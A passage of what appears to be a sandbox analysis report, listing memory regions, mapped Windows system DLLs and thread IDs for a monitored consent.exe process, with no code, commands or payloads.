0x776e0000 end_va = 0x77888fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4598 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 4599 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4600 start_va = 0xff9f0000 end_va = 0xffa0dfff monitored = 0 entry_point = 0xff9fa1d0 region_type = mapped_file name = "consent.exe" filename = "\\Windows\\System32\\consent.exe" (normalized: "c:\\windows\\system32\\consent.exe") Region: id = 4601 start_va = 0x7feffa00000 end_va = 0x7feffa00fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 4602 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 4603 start_va = 0x7fffffd8000 end_va = 0x7fffffd8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 4604 start_va = 0x7fffffde000 end_va = 0x7fffffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 4606 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4607 start_va = 0x120000 end_va = 0x21ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000120000" filename = "" Region: id = 4608 start_va = 0x774c0000 end_va = 0x775defff monitored = 0 entry_point = 0x774d5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4609 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 4610 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 4611 start_va = 0x7fefd7e0000 end_va = 0x7fefd84bfff monitored = 0 entry_point = 0x7fefd7e2780 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 4612 start_va = 0x50000 end_va = 0xb6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4613 start_va = 0x7fefe020000 end_va = 0x7fefe0fafff monitored = 0 entry_point = 0x7fefe040760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 4614 start_va = 0x7feff930000 end_va = 0x7feff9cefff monitored = 0 entry_point = 0x7feff9325a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 4615 start_va = 0x7fefdd60000 end_va = 0x7fefdd7efff monitored = 0 entry_point = 0x7fefdd660e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 4616 start_va = 0x7fefda00000 end_va = 0x7fefdb2cfff monitored = 0 entry_point = 0x7fefda4ed50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 4617 start_va = 0x7fefdca0000 end_va = 0x7fefdd06fff monitored = 0 entry_point = 0x7fefdcab03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 4618 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 0 entry_point = 0x775fa2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 4619 start_va = 0x7fefdc00000 end_va = 0x7fefdc0dfff monitored = 0 entry_point = 0x7fefdc01080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 4620 start_va = 0x7fefdb30000 end_va = 0x7fefdbf8fff monitored = 0 entry_point = 0x7fefdbaa874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 4621 start_va = 0x7fefdd80000 end_va = 0x7fefdf82fff monitored = 0 entry_point = 0x7fefdda3330 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 4622 start_va = 0x7fef9000000 end_va = 0x7fef9006fff monitored = 0 entry_point = 0x7fef9001010 region_type = mapped_file name = "msimg32.dll" filename = "\\Windows\\System32\\msimg32.dll" (normalized: "c:\\windows\\system32\\msimg32.dll") Region: id = 4624 start_va = 0x7fefd070000 end_va = 0x7fefd077fff monitored = 0 entry_point = 0x7fefd072a6c region_type = mapped_file name = "wmsgapi.dll" filename = "\\Windows\\System32\\wmsgapi.dll" (normalized: "c:\\windows\\system32\\wmsgapi.dll") Region: id = 4625 start_va = 0x7fefb9b0000 end_va = 0x7fefb9c0fff monitored = 0 entry_point = 0x7fefb9b1070 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 4626 start_va = 0x7fef8410000 end_va = 0x7fef844afff monitored = 0 entry_point = 0x7fef84122f0 region_type = mapped_file name = "winmm.dll" filename = "\\Windows\\System32\\winmm.dll" (normalized: "c:\\windows\\system32\\winmm.dll") Region: id = 4627 start_va = 0x7fefc9d0000 end_va = 0x7fefc9edfff monitored = 0 entry_point = 0x7fefc9d13b8 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 4628 start_va = 0x7fefd630000 end_va = 0x7fefd63efff monitored = 0 entry_point = 0x7fefd6319b0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 4629 start_va = 0x7fefd5d0000 end_va = 0x7fefd60cfff monitored = 0 entry_point = 0x7fefd5d18f4 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 4630 start_va = 0x7fefd850000 end_va = 0x7fefd9bcfff monitored = 0 entry_point = 0x7fefd8510b4 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 4631 start_va = 0x7fefd6d0000 end_va = 0x7fefd6defff monitored = 0 entry_point = 0x7fefd6d1020 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 4632 start_va = 0x7fef8b80000 end_va = 0x7fef8b8afff monitored = 0 entry_point = 0x7fef8b81290 region_type = mapped_file name = "msctfmonitor.dll" filename = "\\Windows\\System32\\MsCtfMonitor.dll" (normalized: "c:\\windows\\system32\\msctfmonitor.dll") Region: id = 4633 start_va = 0x7fefe4e0000 end_va = 0x7fefe5e8fff monitored = 0 entry_point = 0x7fefe4e1064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 4634 start_va = 0x7fefdff0000 end_va = 0x7fefe01dfff monitored = 0 entry_point = 0x7fefdff1010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 4635 start_va = 0x7fef8b40000 end_va = 0x7fef8b7cfff monitored = 0 entry_point = 0x7fef8b41bdc region_type = mapped_file name = "msutb.dll" filename = "\\Windows\\System32\\msutb.dll" (normalized: "c:\\windows\\system32\\msutb.dll") Region: id = 4641 start_va = 0x7fefc160000 end_va = 0x7fefc353fff monitored = 0 entry_point = 0x7fefc2ec924 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll") Region: id = 4642 start_va = 0x7fefdc20000 end_va = 0x7fefdc90fff monitored = 0 entry_point = 0x7fefdc31e20 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 4643 start_va = 0x2a0000 end_va = 0x33ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 4644 start_va = 0x340000 end_va = 0x43ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 4645 start_va = 0x440000 end_va = 0x5c7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 4646 start_va = 0x5d0000 end_va = 0x750fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 4647 start_va = 0x760000 end_va = 0x1b5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000760000" filename = "" Region: id = 4648 start_va = 0x20000 end_va = 0x20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "consent.exe.mui" filename = "\\Windows\\System32\\en-US\\consent.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\consent.exe.mui") Region: id = 4649 start_va = 0xc0000 end_va = 0xc0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 4650 start_va = 0xd0000 end_va = 0xd0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 4651 start_va = 0xe0000 end_va = 0xe0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 4652 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000f0000" filename = "" Region: id = 4653 start_va = 0x7fefd4c0000 end_va = 0x7fefd4cafff monitored = 0 entry_point = 0x7fefd4c1030 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 4654 start_va = 0x7fefd4f0000 end_va = 0x7fefd514fff monitored = 0 entry_point = 0x7fefd4f9658 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 4656 start_va = 0x1bd0000 end_va = 0x1c4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001bd0000" filename = "" Region: id = 4657 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 4658 start_va = 0x7fefea70000 end_va = 0x7feff7f7fff monitored = 0 entry_point = 0x7fefeaecebc region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 4659 start_va = 0x2a0000 end_va = 0x2cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4660 start_va = 0x330000 end_va = 0x33ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 4661 start_va = 0x1c50000 end_va = 0x1cccfff monitored = 0 entry_point = 0x1c5cec8 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 4662 start_va = 0x1c50000 end_va = 0x1cccfff monitored = 0 entry_point = 0x1c5cec8 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 4663 start_va = 0x7fefd520000 end_va = 0x7fefd52efff monitored = 0 entry_point = 0x7fefd521010 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 4664 start_va = 0x7fefbf80000 end_va = 0x7fefbfd5fff monitored = 0 entry_point = 0x7fefbf8bbc0 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 4665 start_va = 0x1c50000 end_va = 0x1d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c50000" filename = "" Region: id = 4666 start_va = 0x1d50000 end_va = 0x1e2efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001d50000" filename = "" Region: id = 4669 start_va = 0x7fefd9c0000 end_va = 0x7fefd9fafff monitored = 0 entry_point = 0x7fefd9c1324 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 4670 start_va = 0x7fefcf20000 end_va = 0x7fefcf37fff monitored = 0 entry_point = 0x7fefcf23b48 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 4671 start_va = 0x2d0000 end_va = 0x314fff monitored = 0 entry_point = 0x2d1064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 4672 start_va = 0x2d0000 end_va = 0x314fff monitored = 0 entry_point = 0x2d1064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 4673 start_va = 0x2d0000 end_va = 0x314fff monitored = 0 entry_point = 0x2d1064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 4674 start_va = 0x2d0000 end_va = 0x314fff monitored = 0 entry_point = 0x2d1064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 4675 start_va = 0x2d0000 end_va = 0x314fff monitored = 0 entry_point = 0x2d1064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 4676 start_va = 0x7fefcc20000 end_va = 0x7fefcc66fff monitored = 0 entry_point = 0x7fefcc21064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 4677 start_va = 0x1e50000 end_va = 0x1ecffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 4678 start_va = 0x1ed0000 end_va = 0x28cffff monitored = 0 entry_point = 0x1f4cebc region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 4679 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 4680 start_va = 0x1ed0000 end_va = 0x219efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4681 start_va = 0x22c0000 end_va = 0x233ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000022c0000" filename = "" Region: id = 4682 start_va = 0x7feff9d0000 end_va = 0x7feff9e6fff monitored = 0 entry_point = 0x7feff9d1070 region_type = mapped_file name = "imagehlp.dll" filename = "\\Windows\\System32\\imagehlp.dll" (normalized: "c:\\windows\\system32\\imagehlp.dll") Region: id = 4683 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 4684 start_va = 0x2340000 end_va = 0x246ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002340000" filename = "" Region: id = 4685 start_va = 0x2470000 end_va = 0x2e6ffff monitored = 0 entry_point = 0x24ecebc region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 4686 start_va = 0x2470000 end_va = 0x2e6ffff monitored = 0 entry_point = 0x24ecebc region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 4687 start_va = 0xe0000 end_va = 0xe9fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "crypt32.dll.mui" filename = "\\Windows\\System32\\en-US\\crypt32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\crypt32.dll.mui") Region: id = 4688 start_va = 0x7fefd090000 end_va = 0x7fefd0b1fff monitored = 0 entry_point = 0x7fefd095d30 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 4689 start_va = 0x7fefcb60000 end_va = 0x7fefcbabfff monitored = 0 entry_point = 0x7fefcb67950 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 4690 start_va = 0x2470000 end_va = 0x2e6ffff monitored = 0 entry_point = 0x24ecebc region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 4727 start_va = 0x21a0000 end_va = 0x229ffff monitored = 0 entry_point = 0x221cebc region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 4741 start_va = 0x21a0000 end_va = 0x229ffff monitored = 0 entry_point = 0x221cebc region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 4758 start_va = 0x21a0000 end_va = 0x229ffff monitored = 0 entry_point = 0x221cebc region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 4769 start_va = 0x21a0000 end_va = 0x2224fff monitored = 0 entry_point = 0x221cebc region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Thread: id = 201 os_tid = 0xfc8 Thread: id = 203 os_tid = 0xfd0 Thread: id = 204 os_tid = 0xfd4 Thread: id = 205 os_tid = 0xfd8